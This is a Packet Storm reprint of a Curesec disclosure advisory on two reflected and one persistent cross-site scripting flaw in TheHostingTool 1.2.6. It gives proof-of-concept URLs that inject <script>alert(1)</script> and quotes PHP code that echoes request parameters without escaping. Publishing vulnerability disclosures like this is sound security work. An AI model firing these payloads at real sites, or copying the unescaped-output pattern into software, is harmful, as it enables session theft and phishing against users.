what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TheHostingTool 1.2.6 Cross Site Scripting

TheHostingTool 1.2.6 Cross Site Scripting
Posted Nov 9, 2015
Authored by Tim Coen | Site curesec.com

TheHostingTool version 1.2.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 0f401da323e6e37910a30851e200108c31e40c3255c3f525d6cb8912939fdb30

TheHostingTool 1.2.6 Cross Site Scripting

Change Mirror Download
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: TheHostingTool 1.2.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://thehostingtool.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Description

There are two reflected and one persistent XSS in TheHostingTool 1.2.6. With
this, it is possible to bypass CSRF protection, inject JavaScript keyloggers,
or perform phishing attacks.

3. Details

Reflected XSS 1

Proof of Concept:


http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=<script>alert(1)</script>&status

Code:


includes/ajax.php
function notice() {
global $style;
if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) {
if($_REQUEST['status'] == "good") {
$status = true;
} else {
$status = false;
}
echo $style->notice($status, $_REQUEST['message']);
}
return true;
}

includes/class_style.php
public function notice($good, $message) {
if($good) {
//Cool! Everything's OK.
$color = "green";
}
else {
//Oh no! It's a bad message!
$color = "red";
}
$notice = '<strong><em style="color: '. $color .';">';
$notice .= $message;
$notice .= '</em></strong>';
return $notice;
}

Reflected XSS 2

Proof of Concept:


http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid="><script>alert(1)</script>

Code:


invoices.php:
class page {
public function content(){ # Displays the page
global $style, $db, $main, $invoice;
if(isset($_GET['iid']) and isset($_GET['pay'])){
$invoice->set_paid($_GET['iid']);
echo "<span style='color:green'>Invoice #{$_GET['iid']} marked as paid. <a href='index.php?page=invoices&iid={$_GET['iid']}&unpay=true'>Undo this action</a></span>";
}
elseif(isset($_GET['iid']) and isset($_GET['unpay'])){
$invoice->set_unpaid($_GET['iid']);
echo "<span style='color:red'>Invoice {$_GET['iid']} marked as unpaid. <a href='index.php?page=invoices&iid={$_GET['iid']}&pay=true'>Undo this action</a></span>";
}

Persistent XSS

Proof of Concept:

1. Create a new order here: http://localhost/ecommerce/THTv1.2.6/order/
2. When asked for a domain, enter: http://ex.<script>alert(1)</script>.com
3. visit http://localhost/ecommerce/THTv1.2.6/admin/?page=logs or http://
localhost/ecommerce/THTv1.2.6/admin/?page=users&sub=search&do=USERID

4. Solution

This issue has not been fixed

5. Report Timeline

09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-XSS-78.html


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close